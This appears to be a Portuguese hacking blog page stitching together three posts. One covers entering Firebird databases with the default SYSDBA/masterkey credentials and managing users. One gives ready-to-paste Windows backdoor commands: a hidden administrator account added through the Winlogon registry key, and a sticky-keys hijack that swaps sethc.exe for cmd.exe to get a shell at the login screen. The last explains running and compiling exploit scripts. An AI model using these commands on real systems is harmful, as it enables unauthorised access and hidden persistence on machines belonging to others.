Explorando vulnerabilidade: Firebird Database Default Credentials

Firebird Database Tools

There are plenty of tools to interact with Firebird. Most commonly that can be grouped into either a client or a Database management tool. We’ll look at one of each.

FlameRobin (Client)

FlameRobinis a database administration tool for Firebird RDBMS. Their goal is to build a tool that is:

  • lightweight (small footprint, fast execution)
  • cross-platform (Linux, Windows, Mac OS X, FreeBSD, Solaris)
  • dependent only on other Open Source software”

–Source: http://www.flamerobin.org/

It is easily installed on BackTrack (or other distros that utilize apt):

 root@bt:~# apt-get install flamerobin

To run, launch X windows and type:

 root@bt:~# flamerobin

You may get the following error message, ignore it and continue:

 root@bt:~# The configuration file:
/root/.flamerobin/fr_databases.conf does not exist or cannot be opened.
This is normal for first time users.  You may now register new servers and databases.

nterrogating the Database

With access to the database, you can do any number of tasks. We'll look a couple to get you started. 

Retrieve Remote Server Version

Using FlameRobin, first “register” the remote server so you are able to communicate with it. First open the FlameRobin GUI, then goto Server -> Register Server -> and enter the following:
  • Display name: Friendly name to call the host, I use the IP
  • Hostname: Hostname or IP address
  • Port Number: will usually be 3050, however this instance is running on another port.

Registering the Server so we can communicate with it

 Next, right click on the server that you just registered, choose "Retrieve server version" and provide your credentials. The default firebird username and password is usually:

 Username: SYSDBA
 Password: masterkey

 You should be provided the version number as shown below:

Adding/Changing Users

Another useful task is to add or change user accounts. An interesting piece of information is that the Firebird database does not check any characters beyond 8 in a password. Thus the masterkey default password might as well be “masterke” as the ‘y’ at the end is never checked because it is beyond 8 characters. Additionally, usernames are not case sensitive, however passwords are CaSe SeNsItIvE.

With FlameRobin

Use the instructions above in the “Retrieve Remote Server Version” section in order to register the remote server if you have not done so already. Then right-click on the server that you just registered, select "Manage Users" and enter the SYSDBA credentials if they are not saved from the remote version enumeration above.

 To add a user, just click "Add User" and provide the required information! To modify other users (including changing their passwords) by clicking on the “details” icon which looks like a magnifying glass over a piece of paper.

Mantendo acesso no windows após ataque (basico)

não vou me dar ao trabalho de traduzir dessa vez, muitos jã conehcem essa técnica que é basica! A preguiça nao me deixou traduzir! hauaa desculpem pessoal!

We will discuss 2 most commonly used methods of maintaining access in windows usually called as Backdoors.

1. In the first technique, After getting access to the system we create user account with administrator privilege, thus intrusion again is easy. Use the following commands in the command prompt or you can execute it as a premade batch file.
net user /add "username" "password"
net localgroup administrators /add "username"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" /v username /t REG_DWORD /d 0
2. The second method is more efficient and it is a much secret approach. The method is behind the following vulnerability. In window before logging in, that is when the login screen shows up there is only one .exe file that can be execute. The File is named “sethc.exe” in the system32 directory. This file is used to switch on the sticky keys and can be invoked by pressing shift key 5 times.
What we do here is that we rename the “cmd.exe” in System32 directory to “sethc.exe”, so that command prompt opens with administrator privilege when shift is pressed 5 times. But renaming as such in system32 directory is not possible so we copy the cmd.exe to some other location, rename it  to “sethc.exe”and replace it with the old “sethc.exe”.
If you have administrator access to the account, execute the following command in cmd or as a batch file. You can also do it manually following the above steps, because it is just a rename and moving job.
takeown /f "C:\Windows\system32\sethc.exe"
cacls "C:\Windows\System32\sethc.exe" /e /p %username%:F
copy "C:\Windows\system32\cmd.exe" C:\Windows\"
rename "C:\Windows\cmd.exe" sethc.exe
rename "C:\Windows\system32\sethc.exe" sethc.exe.old
copy "C:\Windows\sethc.exe" "C:\Windows\system32\"
If you don’t have administrator access,  Boot off a windows recovery DVD, press Shift+F10 to spawn CMD, and type
copy "C:\Windows\system32\cmd.exe" C:\Windows\"
rename "C:\Windows\cmd.exe" sethc.exe
rename "C:\Windows\system32\sethc.exe" sethc.exe.old
copy "C:\Windows\sethc.exe" "C:\Windows\system32\"
Very similar to the other one, just you didn’t need to edit permissions.
Now you will notice at any time (even when nobody is logged in and when you’re at the welcome screen) you can spawn cmd as an administrator by pressing shift 5 times quickly.


Como executar scripts/exploits

Algumas pessoas ainda tem dificuldade de como executar scripts/exploits, então nesse post inaugural e talvez nos seguintes, estou pensando em postar coisas básicas pra depois irmos engrossando o caldo. Então Como executar scripts/exploits?Os scritps mais comuns que vocês podem encontrar são escritos em:

Linguagem – Extensão

Perl *.pl
Python *.py
Ruby *.rb
Shell Script *.sh
C *.c
java *.jar

Levando em conta que você já tem os interpretadores instalados, falta executar o script/exploit. Shell Script geralmente usa o interpretador bash, você já vai ter ele instalado no linux, os interpretadores de perl,python e c muitas vezes já vêm instalados, depende da distribuição linux que você está usando.

No prompt de comando:

Executando um script/exploit em perl:

perl nomedoexploit.pl

Executando um script/exploit em python:

python nomedoexploit.py

Executando um script/exploit em ruby:

Executando um script/exploit em shell:


Verificar se o script tem permissão de execução, para dar a permissão, use o comando:

chmod +x nomedoprograma.sh

Executando um script/exploit em c:

Na linguagem em c, temos que compilar o script para poder transformar ele num executável.

gcc nomedoexploit.c -o nomedesejado

Se o programa não contém erros, será criado um executável com o nome que você escolheu, agora você precisa executar ele.


Se der algum erro, é possível que o programa tenha herdado restrições de permissões quando foi criado, você tem que aplicar a permissão de execução.

chmod +x nomedesejado

Executando um script/exploit em java:

java -jar nomedesejado.jar

Cretidos: Animal